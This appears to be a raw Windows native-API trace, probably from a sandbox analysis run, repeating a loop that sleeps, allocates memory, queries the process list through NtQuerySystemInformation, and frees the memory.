NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.758] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.773] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.789] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.804] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.820] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.836] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.851] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.867] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.882] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.900] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.921] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.929] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.946] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.961] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.980] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.991] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.009] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.022] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.040] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.057] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0154.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0154.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0154.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0154.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0154.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0154.071] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0154.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 